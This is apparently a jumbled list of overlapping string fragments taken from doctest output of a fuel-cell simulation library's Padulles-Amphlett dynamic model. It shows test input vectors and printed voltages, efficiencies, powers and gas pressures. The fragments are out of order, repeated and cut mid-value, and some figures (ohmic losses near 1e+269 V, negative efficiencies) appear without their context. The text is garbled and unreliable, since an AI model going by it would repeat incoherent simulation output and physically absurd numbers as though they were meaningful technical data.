0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal", "FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm", "Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency :", "-2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925", "V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power :", "0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335", "E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038", "Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269", ": 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss", "FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271", "Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V", "FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756", "PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ###########", "6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta", "V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic", "PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ###########", "0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575", "V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency", "6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta", "V Eta Ohmic : 
0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power :", ": 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 :", "I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta", ": 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC", "V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm", "Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta", ": 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V", "W ########### I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295", "atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0", "PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ###########", "6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta", "0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499", "Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196", "(Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing", ": 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I", ": 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal :", "V Eta Ohmic : 
0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power :", "FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777", "7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta Activation :", "Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic :", "FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677", "W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675", "4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 :", "E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962", "Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency :", "I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta", "atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0", "1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration :", "V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency", "0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC", "4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706", "Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic :", "0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652", "PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E", "V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic", "FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943", "0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E 
: 6.068389351849069", "########### I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V", "FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392", "FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744", "5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power", "0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power", "E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733", "V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic", "Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O", "shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . 
.", ": 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration", "0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336", "V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm", "0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826", ": 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 :", "Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency :", ": 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal :", "V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage :", ": 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration", "V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage :", "FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737", "W ########### I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006", "I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta", ": 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration", "6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta", ": 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O :", "E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372", "Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144", "W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436", "0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power", "PO2 : 0.19043598052153862 atm Power-Thermal : 
5.249386015321152 W ########### I : 2.6 E", "Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta", "FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418", "atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W", "PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E", ": 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC", "14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 :", "PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E", "########### Report is generating ... Warning : The value of I(>0.1) leads to", "''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector,", ": 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss", "Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic :", "V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm", "V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency", "Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448", ": 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E :", "V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm", ": 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 
2.6555639230341663 W ########### I", "0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I :", ": 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O :", "10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 :", "V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm", "0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189", "Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V", ": 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V", "0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377", "Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O", "I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta", "Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V", "0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power", "V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic", "5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta Activation :", "4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 :", "3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473", ": 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E :", "-3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 :", "V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency", "0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 
4.761340157365757", "0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC", ": 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E :", "FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992", ": 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E :", ": 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal :", "0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss :", "E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149", "PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E", ": 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC", ": 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V", "6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta", "0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage", "0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss :", "0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta Activation :", "Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W", "1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405", "I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta", "Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V", "V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm", ": 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss", ": 
0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I", "Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V", "Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215", "3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 :", ": 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC", ": 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration", ": 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V", "V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency", "Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W", "0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I :", "PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal", "Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496", ": 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V", ": 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss", ": 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta Activation", "Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic :", "Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275", "V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic", "I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta", "-9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 
9.331810347802308e+270 V PH2 :", "I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta", "Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V", ": 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E :", "V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage :", "0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC", "Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency :", "I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta", "Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency :", "4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852", "########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E :", "Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784", ": 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 :", "Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O", "V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage :", "FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162", ": 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V", "Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W", ": 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal :", "0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I :", ": 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V", "Power-Thermal : 3.338951337284836 W 
########### I : 1.8 E : 6.068389351849069 V Eta", "Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592", "FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271", ">>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>>", ": 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC", "V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency", "atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9", ": -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O :", "Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012", "0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936", ": 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E :", "W ########### I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267", "0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC", "0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage", "Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301", "atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V", "0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage", ": 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC", "Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O", "PH2O : 
0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ###########", "6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta", "atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V", ": 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V", "V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm", "0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997", "5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 :", "8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 :", "4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789", ": 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss", "Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V", "3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 :", "V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage :", "W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658", "0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617", "FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469", ": 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC", "E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07", "I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta", "########### I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V", "3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC 
Efficiency : 0.6293798842665886 FC Power", "Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I", "V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm", "Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653", "W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959", ": 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O :", "0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power", "I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta", "V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage :", "Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288", ": 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal :", "Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885", ": 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2", ": 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 :", ": 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V", ": 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V", "PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ###########", "FC Voltage : 
4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm", ": 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V", "0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345", "0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power", "0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302", "V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power :", "0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I :", "Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O", ": 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I", "V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency", ": 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta Activation", "4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873", ": 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V", "Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic :", "W ########### I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334", "V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm", "3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration :", ": 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta Activation", "Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V", "V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm", "atm Power-Thermal 
: 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V", "Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency :", "V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm", "1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration :", "0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage", "Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O", "Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic :", "I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta", "V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency", "0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage", "Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664", "Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V", "atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V", ": 0.24244105102809288 atm PO2 : 